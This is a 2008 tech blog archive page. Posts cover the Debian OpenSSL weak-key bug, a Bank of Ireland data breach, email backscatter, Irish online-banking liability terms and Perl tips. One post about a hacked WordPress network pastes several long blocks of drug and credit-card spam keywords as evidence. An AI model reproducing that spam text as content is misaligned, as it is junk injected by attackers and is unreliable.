Valgrind was warning about unitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to see the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I've found were with initialized data taken from an appropriate entropy pool.

So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.

A pretty major fuck-up, all told.

Update 3: Here's a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called 'dowkd.pl', details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.

It notes this about Apache2 SSL keys:

According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.

So, bad news -- SSL keys will need to be regenerated. Add 'costly' to the list of downsides. (Yet another update: this hasn't turned out quite that badly after all -- many CAs are now offering free reissuance of affected certs.)

Looking at 'dowkd.pl', it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could only generate 1 of only 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(

Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.

Full-text RSS bookmarklet

Published May 12, 2008

This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.

Given an RSS or Atom feed's URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.

The one thing it's missing is a one-click bookmarklet version. So here it is:

Full-text RSS Bookmarklet

Drag that to your bookmarks menu, and next time you're looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!

Guinness in Ireland dodges a bullet

Published May 10, 2008

Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:

Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James's Gate and build a new brewery on the outskirts of Dublin under a plan announced today.

The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.

The renovation of the St James's Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.

This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.

Around 65 staff will remain in brewing operations at St James's Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James's Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.

Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in 'a net reduction in staff of around 250', the company said.

The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.

Diageo said these two plants "do not have the scale necessary for sustained success in increasingly competitive market conditions".

The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered "a severance package alongside career counselling".

Operations at its Waterford brewery will be "streamlined" as part of the re-organisation leading to "some reduction in output". the current workforce of 27 in Waterford would be reduced to 'around 18' but Diageo was unable to confirm the extent of the output reduction.

The company says the St James's Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.

The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James's Gate.

The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.

Paul Walsh, chief executive of Diageo said: 'Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.'

"Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage."

Guinness has been brewed at St James's Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.

the Lisbon Treaty and Libertas’ astroturf

Published May 8, 2008

So, Irish voters will soon be voting in a state-wide referendum on the upcoming Treaty of Lisbon -- the latest set of amendments to how the European Union is run.

Since ratification will require changes to the Irish constitution, we get to vote on these intricacies where most EU inhabitants do not. Unfortunately this means it's not particularly "sexy" -- it's a pretty obtuse and boring set of issues, and deciding which way to vote is not easy, with such snore-worthy stuff at stake.

One of the organisations campaigning for a "no" vote in the referendum is called Libertas. Aileen forwarded on a very interesting article by Chekov Feeney on Indymedia Ireland about them, which is well worth a read if you're interested in Irish politics and the international reach of US lobbying. Here's some snippets:

Declan Ganley, president of Libertas, happens to be president of Rivada Networks, a US defence contractor (they supply emergency communications networks to the US intelligence community).

[...]

On Sunday April 20th, Libertas announced that Ulick McEvaddy was "joining the No To Lisbon Campaign" and publicised the event with a photo-opportunity of the two 'entrepreneurs' in front of the Libertas Campaign bus. McEvaddy is the first member of the Irish business and political elite to join the Libertas campaign since it emerged under the stewardship of Declan Ganley.

What's particularly interesting about this is that McEvaddy is the CEO of Omega Air, a US defence contractor (they supply cargo planes and inflight refuelling services to the US military). [...] According to the [ US Air Force's Integrator Magazine ], "industry insiders say [McEvaddy's] company has even approached U.S. intelligence agencies about tanking services for detainee transfers, to reduce dependence on foreign air fields." In other words, offering to provide inflight refuelling services to rendition flights so that they wouldn't have to stop over at foreign airports such as Shannon on their way to "interrogate" suspects. A very accommodating offer indeed.

McEvaddy was also the figure who got himself appointed to the board of Knock airport with a view to opening it up to US military flights.

Nice guys, then.

The article goes on, and on, and on, detailing some shady transactions involving these guys and their US military/intelligence connections, the "astroturf" nature of the Libertas organisation, and the odd behaviour of the Libertas campaign in general.

It comes to this conclusion:

This article has examined the reality behing the Libertas campaign, the connections of its two high-profile backers, the implausibility of its message, the peculiar nature of its campaign and some of the underlying strategic differences at play. The conclusion is that the evidence suggests that Libertas is most likely to serve primarily as a vehicle for advancing US strategic interests.

Check it out -- it's a must-read.

BoI data breach: a sample customer notification

Published May 2, 2008

More on the Bank of Ireland 30,000-customer data breach (which is up to 31,500 people by now -- BoI promised to contact the "affected" customers by post, warning them that their data had been leaked. If you were wondering what those letters might look like, wonder no more. Here's one, via a friend who found himself in this unenviable position:

So it's not just name, date of birth, and address -- he notes that they've leaked 'information on the current account I use to pay for the policy.'

Interestingly, he says that his life assurance policy was set up directly with their life assurance department, not via the local branch -- which directly contradicts what BoI say on their website:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches: [... list of branches omitted...]

The update from 28 April doesn't clarify this, either. Hmm.

Google Webmaster Tools now includes ‘goog-love.pl’

Published May 1, 2008

Back in 2006, I wrote a script I called "goog-love.pl"; it used Google's now-dead SOAP search API (thanks, Nelson!) to figure out which Google queries your web site was "winning" on. Unfortunately, Google shut down new signups for the SOAP interface later that year.

I was just looking through Google's Webmaster Tools page for taint.org, when I came across the Statistics / Top search queries page:

img

This is exactly what goog-love.pl produced. hooray!

Bank of Ireland: “we don’t understand fraud”

Published April 28, 2008

Check out this logic from the Bank of Ireland, spotted by waider in today's news:

Last week, the bank said that medical records, bank account details, names, addresses and dates of birth of 10,000 customers were on the laptops. [...]

Bank of Ireland said an assessment had concluded that the risk of fraud arising from the thefts was 'very low', as the data on the laptops did not include bank account passwords, PINs or copies of signatures.

So a fraudster would have medical records, bank account details, names, addresses and dates of birth of 10,000 customers, but the risk of fraud is 'very low'? Incredible.

Update: make that 30,000 customers.

Update 2: 31,500 customers, and a sample letter.

Merry Spamiversary

Published April 27, 2008

Peter G. Neumann at the RISKS Forum notes that Last Friday was the anniversary of the sending of the first e-mail spam:

[Thanks to Mike Hogsett for noting this event, and Brad Templeton for recording it.]

What is allegedly the very first spam message was sent roughly 30 years over the ARPANET.

In seeing this, Mike was amused because he works with some of the people it was addressed to, of whom a few are still at SRI: NEUMANN@SRI-KA, GARVEY@SRI-KL, MABREY@SRI-KL, WALDINGER@SRI-KL and some of whom are retired: ENGELBART@SRI-KL, NIELSON@SRI-KL, GOLDBERG@SRI-KL (I am always amused when some of these old ARPANET addresses show up in today's incarnations of spam.)

Also somewhat before Mike's time, Geoff Goodfellow, Eric Kunzelman, Dan Lynch, and many others at SRI were instrumental in the evolution of the ARPANET.

Also included in the enormous enumerated TO: list (historically interesting in itself by not having been suppressed!) are Bill English (who was the catalyst for much of Doug Engelbart's innovations being transitioned from SRI to PARC), Dave Farber, Irv Jacobs, Bob Metcalfe, Jon Postel (who by then had moved from SRI to ISI), three Sutherlands, and Lauren Weinstein, to name just a few.

Happy Birthday, Spam! Sorry I cannot wish you many happy returns.

What’s on this site, April 2008 edition

Published April 25, 2008

It's been a while since I've listed the various sub-sites of taint.org in one post. I've just updated the taint.org wiki's index page to include them, so might as well list them here, too:

Enjoy!

Bank of Ireland’s 10,000-customer security breach

Published April 22, 2008

Bank of Ireland, one of Ireland's biggest high-street banks, was the subject of a breach notification yesterday -- 4 laptops, containing unencrypted "sensitive personal information" about up to 10,000 customers, were stolen between June and October 2007. It seems the Irish Data Protection Commissioner was not informed until last Friday. The Financial Regulator is also looking into the incidents.

According to the Independent, the laptops 'were being used by staff working for Bank of Ireland's life assurance division. They contained the information about medical history, life assurance details, bank account details, names and addresses.'

This breach has raised quite a few issues.

First off, I was watching Questions and Answers last night, and was shocked by the naivete of the assembled panel. One panelist, for example, reckoned that common criminals wouldn't understand the value of this data -- so it was probably nothing to worry about!

There was absolutely no concept of how widespread identity theft has become -- using stolen identity information to apply for credit cards is part of Petty Theft 101 these days, since filling out forms is a lot easier than breaking and entering, obviously. There was also no appreciation of how little protection Irish consumers have in this regard with current Irish banking T&Cs.

According to previous research, about 2% of accounts compromised in data breaches become victim to identity theft.

Some comments from the bank from those articles:

'The data was not encrypted, although it is understood there was software security installed on the stolen computers.'

Doubtless, "software security" refers to some kind of useless Maginot Line boondoggle like Norton Internet Security. This would have absolutely no useful effect in this case. The only useful way to protect customer data on a stolen laptop is to use encrypted storage.

'In the interim the bank has monitored all of these customer accounts and can confirm that there has been no evidence of fraudulent or suspicious activity.'

This is a fallacy. This data provides plenty of information regarding the customer's identity -- information which is useful to receive loans and credit fraudulently, elsewhere. Monitoring the bank's accounts is of no help in that case. On top of that, identity information like your date of birth, mother's maiden name, health status, and so on doesn't expire -- that info will still be useful for identity theft, 10 years from now, or as a stepping-stone to further fraud.

As John O'Shea noted on Twitter earlier, there was nothing on their website about it this morning; there is now, however -- a broken link on the front page. oops!

Figuring out the puzzle and fixing the URL's errors gets you to this page, which notes:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches:

  • Drogheda
  • Dunleer
  • Bagnelstown
  • Court Place Carlow
  • Stephens Green
  • Tallaght
  • Montrose

Anybody who is not a customer of these branches is not affected by this incident.

As far as I can make out, the bank didn't issue this breach notification. It appears from the coverage that this information was first announced by Data Protection Commissioner Billy Hawkes to RTE yesterday, leaving the bank apparently scrambling to catch up:

"The thefts of the laptops were only brought to the attention of the appropriate authorities in the bank in the past number of weeks," Bank of Ireland said in a statement that offered no other explanation for the long delay.

It would have been so much better if BoI had been proactive with breach notification -- examples from overseas have illustrated its value. As Adam Shostack has noted repeatedly over the past few years: the rules have changed.

As for repercussions for BoI, it'll be interesting to see if anything happens. For "live" customer data on up to 10,000 customers to be stored, in unencrypted form, on a laptop is terrible security practice -- but as far as I know, there are no laws or regulations requiring anything better in Ireland, unfortunately. :( However:

Consideration will be given as to what further action will be sought from Bank of Ireland to ensure that the obligations contained in the Data Protection Acts in this area are met.

On a broader level, this issue serves to highlight once again the absolute necessity for all organisations in the public and private sector to take their data protection responsibilities seriously. In particular, all organisations should be assessing immediately the necessity for storing personal data on laptops. If a need is found, appropriate security measures such as encryption should be put in place immediately.

Go Billy! ;)

The best thing to come out of Caerphilly

Published April 21, 2008

Caerphilly is a small commuter town in South Wales, notable mainly for Caerphilly cheese and a castle.

Well, you can add one more thing to that list; its inhabitants also provided some key data in a major health study, from which emerged one great finding -- it turns out that if you're male, sex twice a week reduces the risk of death from heart disease by about half:

Men who said they had sex twice a week had a risk of dying half that of the less passionate participants who said they had sex once a month, Dr. Davey-Smith's team said.

No other risk factor showed a statistically significant link to the frequency of orgasm.

The authors said that they had tried to adjust the study's design to account for a factor that might explain the findings -- that healthier, fitter men with more healthy life styles engaged in more sex. Even so, they could not explain the differences in risk. Hormonal effects on the body resulting from frequent sex could be among other possible explanations for the findings, Dr. Davey-Smith said.

Here's the science bit, via the BMJ -- a paper entitled 'Sex and death: are they related? Findings from the Caerphilly cohort study':

Result: Mortality risk was 50% lower in the group with high orgasmic frequency than in the group with low orgasmic frequency, with evidence of a dose-response relation across the groups. Age adjusted odds ratio for all cause mortality was 2.0 for the group with low frequency of orgasm (95% confidence interval 1.1 to 3.5, test for trend P=0.02). With adjustment for risk factors this became 1.9 (1.0 to 3.4, test for trend P=0.04). Death from coronary heart disease and from other causes showed similar associations with frequency of orgasm, although the gradient was most marked for deaths from coronary heart disease. Analysed in terms of actual frequency of orgasm, the odds ratio for total mortality associated with an increase in 100 orgasms per year was 0.64 (0.44 to 0.95).

Conclusion: Sexual activity seems to have a protective effect on men's health.

The perfect excuse ;) Thanks, Caerphilly!

My commute vs Jaffa Cakes

Published April 18, 2008

Last weekend, I picked up a super-cheap cycling computer in Aldi for 20 Euros. I cycle to work, and I thought it'd be fun to get some geeky number-crunching in on my daily commute.

Here are the figures for my trip into work:

  • Ride time: 12:16
  • Trip distance: 2.4 miles
  • Avg speed: 12.7 MPH
  • Max speed: 22.4 MPH
  • Total KCal work performed: 136
  • Max pulse rate: 146

Given that there are 46 kilocalories in a Jaffa Cake, 136 KCal means that every day, I can eat 3 Jaffa Cakes with impunity. Result! ;)

Also: some relevant commentary from Penny Arcade.

Google Calendar ‘Quick Add’ smart keyword bookmark

Published April 17, 2008

Google Calendar has a nifty feature, "Quick Add", where you can enter a natural-language string like "lunch with Justin, 1pm 20/4/08", it parses it, and adds an appointment to your calendar. However, the link in the Calendar UI can't be bookmarked; you have to go to the Calendar page, wait for it to sloooowly load all its AJAX bits, hit the link, and only then type the appointment details, by which time I've forgotten it anyway ADD-style. ;)

Elias Torrez came up with a Firefox extension to use the Quick Add feature in one keypress, but in my opinion that's overkill -- I don't want the overhead of another extension, the upgrade worries, and I don't want it using up a keyboard shortcut either. I'd prefer to just have this as a Firefox Smart Keyword -- and thankfully the trick is in the comments for his blog post, from someone called Bjorn. So here's the deal:

Name: Google Calendar Quick Add

Location: http://www.google.com/calendar/event?ctext=+%s+&action=TEMPLATE&pprop=HowCreated%3AQUICKADD

Keyword: newcal

Description: add a new event in Google Calendar

enjoy!

Downloadable movies and the DVP5960

Published April 14, 2008

So Mulley mentions that Moviestar.ie are planning to offer downloadable movies. Great concept, but I can guarantee the execution will be crap on a stick. :(

First off, the content available:

'When the service goes live on 1 May, customers will be able to avail of content from several Irish producers including Network Ireland Television, as well as Video International’s film library which includes films like The Little Shop of Horrors. The company is also seeking content from both the History and Biography Channels, which would mean a substantial back catalogue of documentary shows.'

Sorry, but: snore.

Secondly, the technology used:

'Moviestar.ie content must be downloaded onto a PC or laptop but can then be transferred over to digital media players like the iPod Touch for viewing on the go. This service will be compatible with Apple Macs but only if the user downloads Windows Media Player.'

So in other words, it's Windows Media. That means it won't play on my TV through my MythTV box, on a USB stick plugged into a Philips DVD player, on my Linux laptop, or even on a normal DVD player using a burned DVD.

Too little, too late. Plenty of Irish consumers are already consuming downloaded video -- as the popularity of the Philips DVP5960 demonstrates. For legal video downloads to work, they need to be somewhere remotely near as convenient and usable as BitTorrent.

Using DRM is just falling down the same rabbit hole that swallowed up downloadable music for 5 years. Nobody used that either, until gradually the companies involved realised that opening up was the only way to get customers, bringing us to where we are today -- legal downloads using the MP3 format.

BTW, I know that's the same DRM technology used by Channel 4's "4oD" download service. Big deal -- I don't bother trying to watch that stuff either, for the same reasons. If Channel 4 jumped off a cliff, would Moviestar.ie jump after them?

img

(By the way, that Philips DVD player is a total success story. That's a name-brand hardware manufacturer, making a low-end, $60 DVD player, with support for viewing downloaded XviD AVI movies on a USB stick. Apparently it'll also play off USB hard disks, too. It's immensely popular; for example, here's a customer review of 10/10: "Best thing ever". Several of my friends have them, and praise them highly. I'm coming up to DVD player replacement time, and I'm planning to get one too.)

Backscatter rising

Published April 12, 2008

Recently, more and more people have been complaining about backscatter; its levels seem to have increased over the past few weeks.

If you're unfamiliar with the terminology -- backscatter is mail you didn't ask to receive, generated by legitimate, non-spam-sending systems in response to spam. Here are some examples, courtesy of Al Iverson:

  • Misdirected bounces from spam runs, from mail servers who "accept then bounce" instead of rejecting mail during the SMTP transaction.
  • Misdirected virus/worm "OMG your mail was infected!" email notifications from virus scanners.
  • Misdirected "please confirm your subscription" requests from mailing lists that allow email-based signup requests.
  • Out of office or vacation autoreplies and autoresponders.
  • Challenge requests from "Challenge/Response" anti-spam software. Maybe C/R software works great for you, but it generates significant backscatter to people you don't know.

It used to be OK to send some of these types of mail -- but no longer. Nowadays, due to the rise in backscatter caused by spammer/malware abuse, it is no longer considered good practice to "accept then bounce" mail from an SMTP session, or in any other way respond by mail to an unauthorized address of the mail's senders.

Backscatter as spam delivery mechanism

I would hazard a guess that this rise is due to one of the major spam-sending botnets adopting the use of "real" sender addresses rather than randomly-generated fake ones, probably in order to evade broken-by-design Sender-Address Verification filters.

There's an alternate theory that spammers use backscatter as a means of spam delivery -- intending for the mails to bounce, in effect using the bounce as the spam delivery mechanism. Symantec's most recent "State of Spam" report in particular highlights this.

I don't buy it, however. Compare their own example message -- here's what the mail originally sent by the spammer to the bouncer, rendered:

img

And here's what it looks like once it passes through the bouncer's mail system:

img2

That's simply unreadable. There's absolutely no way for a targeted end user to read the "payload" there...

Getting rid of it

I haven't run into this recent spike in backscatter at all, myself, since I have a working setup that deals with it. This blog post describes it. If you're using Postfix and SpamAssassin, it would be well worth taking a look; if you're just using SpamAssassin and not Postfix, you should still try using the Virus Bounce Ruleset to rid yourself of various forms of unwanted bounce message.

Note that you need to set the 'whitelist_bounce_relays' setting to use the ruleset, otherwise its rules will not fire.

SPF

There's a theory that setting SPF records (or other sender-auth mechanisms like DomainKeys or DKIM) on your domains, will reduce the amount of backscatter sent to your domains. Again, I doubt it.

Backscatter is being sent by old, legacy mail systems. These systems aren't configured to take SPF into account either. When they're eventually updated, it's likely they'll be fixed to simply not send "accept then bounce" responses after the SMTP transaction has completed. It's unlikely that a system will be fixed to take SPF into account, but not fixed to stop sending backscatter noise.

It's good advice to use these records anyway, but don't do it because you want to stop backscatter.

What about my own bounces?

You might be worried that the SpamAssassin VBounce ruleset will block bounces sent in response to your own mail. As long as the error conditions are flagged during the SMTP transaction (as they should be nowadays), and you've specified your own mailserver(s) in 'whitelist_bounce_relays', you're fine.

Liability for internet banking fraud in Ireland

Published April 11, 2008

Steven Murdoch at Light Blue Touchpaper notes that the UK banking code now includes wording to make the customer liable for losses attributable to them "acting without reasonable care", where "reasonable care" bizarrely includes installing anti-virus software on their PCs.

The Register also picked up on this, as did Brian Krebs in the Washington Post, comparing it with the vastly superior customer protection offered by the US banks.

I was curious, so I went looking at the Irish situation. Needless to say, it's not pretty.

I couldn't find anything in the Irish Banking Federation's Code Of Practice for Personal Customers, unfortunately. However, AIB's terms and conditions for use of their Internet Banking product contain this:

5 Transactions on the Account:

5.1 The User authorises AIB to act upon any instruction to debit an Account received through AIB Phone & Internet Banking which has been transmitted using all or part of the Registration Number, PAC and/or any other authentication process which AIB may require to be used in connection with AIB Phone & Internet Banking (including but not limited to a Code Card) without requiring AIB to make any further authentication or enquiry, and all such debits shall constitute a liability of the User. Where the User's Account is maintained in joint names the liability of the Account Holders shall be joint and several.

5.6 Entries in an Account in respect of Bill Payments, Fund Transfers and Top-Ups shall be prima facie evidence that the transfer or debit represented thereby has been duly authorised and shall be binding on AIB and the User unless and until proved to the contrary.

6 International Payments:

6.9 To the extent permitted by law, and notwithstanding anything to the contrary herein, AIB shall not be liable for, and shall be indemnified in full by the User against, any loss, damage or other liability that the User or AIB may suffer arising out of or in connection with the User’s use of the International Payment services (whether as the sender or receiver of an International Payment) unless such loss, damage or liability is caused by AIB’s fraud, wilful default or negligence. In no circumstances will AIB be liable for any increased costs or expenses, or for any loss of profit, business, contracts, revenues or anticipated savings or for any special, indirect or consequential damage of any nature whatever.

As far as I can tell, basically the AIB have no liability here at all -- if a bad guy gets hold of your PIN code and account number, and empties your account, tough luck.

What about Bank of Ireland? It seems they agreed to refund phishing losses in an incident back in 2006. But their 365online Terms and Conditions now say this:

13 Indemnity

13.2 Without prejudice to the generality of Clause 13.1 above, the Bank shall have no liability whatsoever in respect of any loss suffered by the Customer as a result of their breach of Clause 4 [jm: Security/Authentication] by way of knowingly, negligently or recklessly disclosing the Security Devices or any of them.

So it's all pretty bad news for Irish banking customers. This is pretty bad news -- it's only a matter of time before Irish banks are targeted by a new Banking Trojan, and given that antivirus software has an 80% miss rate these days, even having an up-to-date AV scanner isn't going to be much help.

My answer? Don't do internet banking on Windows machines. Simple as that.

IIA’s nasty infection

Published April 9, 2008

The Irish Internet Association have a weblog at blog.iia.ie. Back on January 30, this had a Technorati rank of 587893, with 21 inbound links from 14 blogs. That's about what you'd expect -- comparable with Chris Horn's blog, for instance.

However, fast forward to today, and in the intervening 3 months, it seems to have suddenly shot up to 23,322 inbound links from 550 blogs, giving it a Technorati rank of 6,870.

To put that in perspective, that puts it comfortably in the top 3 in the Irish Blogs Technorati Top 100 -- beating Damien Mulley's 7,859, but just short of Donncha O'Caoimh's stellar 3,434 -- and ahead of these other gods of the Irish blogosphere:

Pretty impressive ;)

I was curious, so I went investigating. Of those thousands of inbound links, here's some samples of the most recent, pasted from the Technorati inbound links page:

barkingmoose

Atacand Free instant online credit report Application credit card Cheap Paxil Does your credit score Household bank credit card application Apr for credit cards Buy Cephalexin? Aciphex Cheap Feldene Zovirax Risperdal Buy Naprosyn, Propecia Credit score codes Poor credit score, Propecia Uk Canada credit card online application Motrin Business credit score Cheap Cialis Jelly 50 Cent Free Ringtones Celexa How to improve my credit score Buy Inderal

4 days ago in barkingmoose by barkingmoose · Authority: 3

The Peninsula's Edge

Jc penny credit card application Credit cards 1.99 apr ny Affect credit score For credit score American express credit card application Freee credit report Instant fleet 0 apr credit card application? Hydrocodone For low credit scores, No credit instant approval credit cards Annual creditreport.com, Tramadol Credit reporting service Configuration VPN Cheap credit reports. Buy Premarin Carisoprodol Soma Propecia Generic

6 days ago in The Peninsula's Edge by ricsmith510 · Authority: 9

The Incredible Blog

Prepaid credit card uk Phentrimine Cheap Zovirax: Calan Highest credit score Ambien Valtrex: Ultram 3 credit reporting agencies Credit cards online application Instant approval student credit cards, Apr balance transfer credit cards Free government credit report Transunion free credit report Credit card debt bankruptcy? Propecia Propecia Uk! Correcting credit reports Cialis Uk Credit rating report Buy Synthroid Instant capital one 0 interest credit card application

7 days ago in The Incredible Blog · Authority: 1

Quilters' Blogs

Annualcreditreport Instantly instant free online credit report Credit cards instant approval Guaranteed instant approval credit cards Lexapro Get my credit score, Card consolidation credit debt financial internet Chevron credit card services. Risperdal Lower credit card debt VPN connection One credit card application Xanax Viagra! Vasotec Diazepam Fix my credit report Credit report bureau. Cialis Soft Tabs! Ativan? Secured loans to increase credit score Cheap Amaryl Cheap Prednisone Alprazolam! Cheap 7 days ago in Quilters' Blogs · Authority: 5

TPN :: Martial Arts Explorer

Luvox Credit score of Plavix 50 Cent Free Ringtones, Cheap Elavil? Free consumer credit report: Famvir Improve credit score fast Phentermine Online Zovirax Cialis Soft Tabs Apr for credit cards! Ultram Zoloft Credit card deal 0 Deltasone! VPN: Cheap Cardura Credit score rankings! Annual credit report .com Interest rate credit score: Carisoprodol Flagyl ER Online Cialis Soft Tabs Enable VPN 0 apr credit card application Free business credit report Ambien Low 7 days ago in TPN :: Martial Arts Explorer · Authority: 56

Take a look at the 'inbound links' list -- thousands more just like that.

All of the affected blogs have been hacked to deliver these spam links. They run unpatched versions of WordPress vulnerable to a major security hole. On a casual visit, their pages seem fine -- but "View Source", scroll to the bottom, and there are thousands of spam links for drugs, ringtones, cheap credit, etc. on each one, exactly as above, and as described by Kevin Burton in his description of the current epidemic of blog spam.

How did links to the IIA's blog wind up in this collection?

It's worth noting that the IIA's blog does not display the same symptoms -- the links aren't present on their pages.

However, this post provided a good tip as to what has happened. Those infected blog pages point, in turn, to other infected blogs. Somewhere within the IIA's blog setup, there's a page inserted by a bad guy, collecting thousands of illicit links from thousands of other infected sites -- and sure enough, Irish Web Watcher found it on the IIA's site -- here it is.

Looks like the IIA have a pretty major disinfection job on their hands, and urgently -- there's already a lot of spammy results appearing in the Google index from that site, and the next step after that is usually removal from the index once Google notice it.

Google now include Code Search in normal results

Published April 7, 2008

Latest Google curiosity... I hadn't spotted this before: it appears Google is now including 'Code Snippet' results in the results for its normal search. For example, a search for XSLoader gives this result:

xsloader

The results highlighted on the page are for a local variable in a Java module, rather than the much more common XSLoader perl module. I guess 'Code Snippet' search is case-sensitive.

RAII in perl

Published April 2, 2008

Suppose you have matching start() and end() functions. You want to ensure that each start() is always matched with its corresponding end(), without having to explicitly pepper your code with calls to that function. Here's a good way to do it in perl -- create a guard object:

package Scoper;
sub new {
  my $class = shift; bless({ func => shift },$class);
}
sub DESTROY {
  my $self = shift; $self->{func}->();
}

Here's an example of its use:

{
  start();
  my $s = Scoper->new(sub { end(); });
  [... do something...]
}
[at this point, end() has been called, even if a die() occurred]

The idea is simply to use DESTROY to perform whatever the cleanup operation is. Once the $s object goes out of scope, it'll be deleted by perl's GC, in the process of which, calling $s->DESTROY(). In other words, it's using the GC for its own ends.

Unlike an eval { } block to catch die()s, this will even be called if exit() or POSIX::exit() is called. (POSIX::_exit(), however, skips DESTROY.)

This is a pretty old C++ pattern -- Resource Acquisition Is Initialization. C++'s auto_ptr template class is the best-known example in that language. Here's a perl.com article on its use in perl, from last year, mostly regarding the CPAN module Object::Destroyer. To be honest, though, it's 6 lines of code -- not sure if that warrants a CPAN module! ;)

RAII is used in SpamAssassin, in the Mail::SpamAssassin::Util::ScopedTimer class.

“What’s New” archaeology

Published March 31, 2008

jwz has, incredibly, resurrected home.mcom.com, the WWW site of the Mosaic Communications Corporation, as it was circa Oct 1994.

Edmund Roche-Kelly was kind enough to get in touch and note this link -- http://home.mcom.com/home/whatsnew/whats_new_0993.html:

September 3, 1993

IONA Technologies (whose product, Orbix, is the first full and complete implementation of the Object Management Group's Common Object Request Broker Architecture, or CORBA) is now running a Web server.

An online pamphlet on the Church of the SubGenius is now available.

Guess who was responsible for those two ;)

I was, indeed, running the IONA web server -- it was set up in June 1993, and ran Plexus, a HTTP server written in Perl. IONA's server was somewhere around public web server number 70, world-wide.

The SubGenius pamphlet is still intact, btw, although at a more modern, "hyplan"-less URL these days. It'll be 15 years old in 6 months... how time flies!

Sharing, not consuming, news

Published March 28, 2008

The New York Times yesterday had a great article about modern news consumption:

According to interviews and recent surveys, younger voters tend to be not just consumers of news and current events but conduits as well — sending out e-mailed links and videos to friends and their social networks. And in turn, they rely on friends and online connections for news to come to them. In essence, they are replacing the professional filter — reading The Washington Post, clicking on CNN.com — with a social one.

“There are lots of times where I’ll read an interesting story online and send the URL to 10 friends,” said Lauren Wolfe, 25, the president of College Democrats of America. “I’d rather read an e-mail from a friend with an attached story than search through a newspaper to find the story.”

[Jane Buckingham, the founder of the Intelligence Group, a market research company] recalled conducting a focus group where one of her subjects, a college student, said, “If the news is that important, it will find me.”

In other words, as Techdirt put it, this generation of news readers now focuses on sharing the news, rather than just consuming it -- and if you want to share a news story, there's no point passing on a subscription-only URL that your friends and contacts cannot read.

What newspapers need to do to remain relevant for this generation of news consumers is not to hide their content behind paywalls and registration-required screens. The Guardian got their heads around this a few years back, and have come along in leaps and bounds since then. I wonder if the Irish Times is listening?

converting TAP output to JUnit-style XML

Published March 26, 2008

Here's a perl script that may prove useful: tap-to-junit-xml...

NAME

tap-to-junit-xml - convert perl-style TAP test output to JUnit-style XML

SYNOPSIS

tap-to-junit-xml "test suite name" [ outputprefix ] < tap_output.log

DESCRIPTION

Parse test suite output in TAP (Test Anything Protocol) format, and produce XML output in a similar format to that produced by the <junit> ant task. This is useful for consumption by continuous-integration systems like Hudson.

Written in perl, requires TAP::Parser and XML::Generator. It's based on junit_xml.pl by Matisse Enzer, although pretty much entirely rewritten.

Pulseaudio ate my wifi

Published March 21, 2008

I've just spent a rather frustrating morning attempting to debug major performance problems with my home wireless network; one of my machines couldn't associate with the AP at all anymore, and the laptop (which was upstairs in the home office, for a change) was getting horrific, sub-dialup speeds.

I did lots of moving of Linksys APs and tweaking of "txpower" settings, without much in the way of results. Cue tearing hair out etc.

Eventually, I logged into the OpenWRT AP over SSH, ran iftop to see what clients were using the wifi, and saw that right at the top, chewing up all the available bandwidth, was a multicast group called 224.0.0.56. The culprit! There was nothing wrong with the wifi setup after all -- the problem was massive bandwidth consumption, crowding out all other traffic.

You see, "pulseaudio", the new Linux sound server, has a very nifty feature -- streaming of music to any number of listeners, over RTP. This is great. What's not so great is that this seems to have magically turned itself on, and was broadcasting UDP traffic over multicast on my wifi network, which didn't have enough bandwidth to host it.

Here's how to turn this off without killing "pulseaudio". Start "paman", the PulseAudio Manager, and open the "Devices" tab:

(click on the image to view separately, if it's partly obscured.)

